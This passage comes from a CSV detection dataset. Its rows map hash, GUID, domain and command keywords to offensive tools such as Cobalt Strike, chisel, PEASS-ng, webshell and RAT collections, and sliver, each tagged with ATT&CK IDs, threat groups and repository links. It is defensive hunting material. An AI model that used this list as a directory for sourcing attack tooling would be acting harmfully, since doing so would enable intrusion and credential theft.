T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 
- T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","35580" "*bdllinject*",".{0,1000}bdllinject.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - 
TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35581" "*bdllload*",".{0,1000}bdllload.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - 
LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","35582" "*bdllload*",".{0,1000}bdllload.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - 
Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35583" "*bdllspawn*",".{0,1000}bdllspawn.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","35584" "*bdllspawn*",".{0,1000}bdllspawn.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security 
assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35585" "*bdtryujndyund6e5.azurewebsites.net*",".{0,1000}bdtryujndyund6e5\.azurewebsites\.net.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - 
TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","1","N/A","N/A","9","","N/A","","","","35586" "*be038bcb58b9e744c9821823ac59c3d9f4cc9456f445c41a840b7a6acbc21fc3*",".{0,1000}be038bcb58b9e744c9821823ac59c3d9f4cc9456f445c41a840b7a6acbc21fc3.{0,1000}","offensive_tool_keyword","RottenPotatoNG","perform the RottenPotato attack and get a handle to a privileged token","T1134.001 - T1055.012 - T1547.001","TA0004","N/A","Sandworm","Privilege Escalation","https://github.com/breenmachine/RottenPotatoNG","1","0","#filehash","N/A","8","10","935","183","2017-12-29T14:38:47Z","2017-12-29T13:19:03Z","35587" "*be03dfd28d37a8c444de321828edef417638c767a2a167133c5bf3a0b51ad60c*",".{0,1000}be03dfd28d37a8c444de321828edef417638c767a2a167133c5bf3a0b51ad60c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","35588" "*be041565c155ce5a9129e2d79a2c8d18acf4143a7f3aa2237c15a15a89b6625e*",".{0,1000}be041565c155ce5a9129e2d79a2c8d18acf4143a7f3aa2237c15a15a89b6625e.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - 
T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/darkr4y/geacon","1","0","#filehash","N/A","10","10","1189","206","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z","35589" "*be0815883380c13d0a6855395acf07270cdbf4c8e13018439cffacd8e52485c6*",".{0,1000}be0815883380c13d0a6855395acf07270cdbf4c8e13018439cffacd8e52485c6.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","35590" "*be09f42e9225e82fe619a700b93d33e3bf0603266b7865d45a786630d4303aa7*",".{0,1000}be09f42e9225e82fe619a700b93d33e3bf0603266b7865d45a786630d4303aa7.{0,1000}","offensive_tool_keyword","Psnmap","Powershell scanner (nmap like)","T1086 - T1046 - T1059","TA0007","N/A","Black Basta","Discovery","https://github.com/KurtDeGreeff/PlayPowershell/blob/master/PSnmap.ps1","1","0","#filehash","N/A","7","2","178","64","2024-08-23T18:24:20Z","2015-01-24T10:46:41Z","35591" 
"*be1329d07bf1b6f6558c7f95103c773d70eb68d652c4da6143f581332141a954*",".{0,1000}be1329d07bf1b6f6558c7f95103c773d70eb68d652c4da6143f581332141a954.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","35592" "*be1c2b305595e848c387fc8aa5c7ca24fc8104c21aaaad5c3c9fef50e57668db*",".{0,1000}be1c2b305595e848c387fc8aa5c7ca24fc8104c21aaaad5c3c9fef50e57668db.{0,1000}","offensive_tool_keyword","PrivFu","Kernel Mode WinDbg extension for token privilege edit","T1055 - T1078 - T1134","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","PrivEditor","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","35594" "*be224373f60705c94e87de8024ae646302fc29643e3f1f15ab0e84f1c375353b*",".{0,1000}be224373f60705c94e87de8024ae646302fc29643e3f1f15ab0e84f1c375353b.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","35596" "*be26213aa79b0c414ff4566b23bccef80d7b5a8bb8a022b5b64c2ca3a5659ac1*",".{0,1000}be26213aa79b0c414ff4566b23bccef80d7b5a8bb8a022b5b64c2ca3a5659ac1.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","35598" 
"*be28f0c338095b629bfd563abd38c472c6b88618c3647a97c79f6c78cf620e15*",".{0,1000}be28f0c338095b629bfd563abd38c472c6b88618c3647a97c79f6c78cf620e15.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","35599" "*be3345a2cedd13aae147564426bb743332b2053868ba7c3e64f14c247416f86c*",".{0,1000}be3345a2cedd13aae147564426bb743332b2053868ba7c3e64f14c247416f86c.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#filehash","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","35600" "*be3ae8e7cd4138850830f1d0b40cb409160a4449dda205a325c95de7bd2b76b0*",".{0,1000}be3ae8e7cd4138850830f1d0b40cb409160a4449dda205a325c95de7bd2b76b0.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","35601" "*be46cdf9a5079ad20e237f131383bae6873297c3cff36ccdde274c1b78935810*",".{0,1000}be46cdf9a5079ad20e237f131383bae6873297c3cff36ccdde274c1b78935810.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - 
Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","35603" "*be46cdf9a5079ad20e237f131383bae6873297c3cff36ccdde274c1b78935810*",".{0,1000}be46cdf9a5079ad20e237f131383bae6873297c3cff36ccdde274c1b78935810.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","35604" "*be515aac4a4c52e55708baa77fab03d9f6ab2e7045d7147f83aa07cafb448180*",".{0,1000}be515aac4a4c52e55708baa77fab03d9f6ab2e7045d7147f83aa07cafb448180.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","35607" "*be5cfdd35404d90af8b73a2c53fcc2e2ca3aafb2af4f5484b8aea25f8cb60e73*",".{0,1000}be5cfdd35404d90af8b73a2c53fcc2e2ca3aafb2af4f5484b8aea25f8cb60e73.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation 
tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","35611" "*be5f14ffdc5bb327e53934a9ef6c55500e8d4ffd920a77df0b6ae209793567a5*",".{0,1000}be5f14ffdc5bb327e53934a9ef6c55500e8d4ffd920a77df0b6ae209793567a5.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","35612" "*be642266-f34d-43c3-b6e4-eebf8e489519*",".{0,1000}be642266\-f34d\-43c3\-b6e4\-eebf8e489519.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#GUIDproject","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","35614" "*be6556cd585cd39c332fb5ed6881b5766af3bb01d0276835e172e81d04f06237*",".{0,1000}be6556cd585cd39c332fb5ed6881b5766af3bb01d0276835e172e81d04f06237.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","35615" "*be6d0dc445a00098d6cfbc537423ce23c49b4b08d530ea11709e617636c883a0*",".{0,1000}be6d0dc445a00098d6cfbc537423ce23c49b4b08d530ea11709e617636c883a0.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","35616" 
"*be6d43b84e5b69c33f6e155d0e7be48bb3da4a322d19feac4073ef14b845f9fa*",".{0,1000}be6d43b84e5b69c33f6e155d0e7be48bb3da4a322d19feac4073ef14b845f9fa.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","35617" "*be76da790e34b58cd8f35913154aa4d4a749372918cd00324993370bd086ba5a*",".{0,1000}be76da790e34b58cd8f35913154aa4d4a749372918cd00324993370bd086ba5a.{0,1000}","offensive_tool_keyword","spraykatz","Spraykatz is a tool without any pretention able to retrieve credentials on Windows machines and large Active Directory environments.","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008","TA0003 - TA0004 - TA0007","N/A","N/A","Credential Access","https://github.com/aas-n/spraykatz","1","0","#filehash","N/A","9","8","763","121","2020-06-20T12:14:00Z","2019-09-09T14:38:28Z","35619" "*be7732144c35e08d90a04d6d668c29b4341a44428b3d9c08ae69865bd3b97f17*",".{0,1000}be7732144c35e08d90a04d6d668c29b4341a44428b3d9c08ae69865bd3b97f17.{0,1000}","offensive_tool_keyword","Gato-X","automate advanced enumeration and exploitation techniques against GitHub repositories and organizations","T1190 - T1083 - T1588 - T1587","TA0001 - TA0007 - 
TA0005","N/A","N/A","Reconnaissance","https://github.com/adnanekhan/Gato-X","1","0","#filehash","N/A","7","3","270","35","2025-04-21T17:57:09Z","2024-01-27T18:55:16Z","35620" "*be7fdcbd1dee825a6adba54c5f2b72fb4000cb474c834d07e1f0f293d54e1f58*",".{0,1000}be7fdcbd1dee825a6adba54c5f2b72fb4000cb474c834d07e1f0f293d54e1f58.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","35621" "*BE801141-0D4D-4950-85C8-8E93C9D3312F*",".{0,1000}BE801141\-0D4D\-4950\-85C8\-8E93C9D3312F.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#GUIDproject","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","35622" "*be93d296832c123ba18b2f43629dae79956b203386edfef96e180470259fa417*",".{0,1000}be93d296832c123ba18b2f43629dae79956b203386edfef96e180470259fa417.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","35624" "*be9b10dddf393c3c4abe05f9237a0e97a8697da407505b192c4385f01e8d9615*",".{0,1000}be9b10dddf393c3c4abe05f9237a0e97a8697da407505b192c4385f01e8d9615.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - 
TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","35625" "*be9b23c9cf6731a8ae3d288871d277e64ca0caa5020433c4516b58e10f5e641f*",".{0,1000}be9b23c9cf6731a8ae3d288871d277e64ca0caa5020433c4516b58e10f5e641f.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","35626" "*be9bee58f25350d6047bcb9de5b38957d7591c7b048ddd0a2e69162252516a54*",".{0,1000}be9bee58f25350d6047bcb9de5b38957d7591c7b048ddd0a2e69162252516a54.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 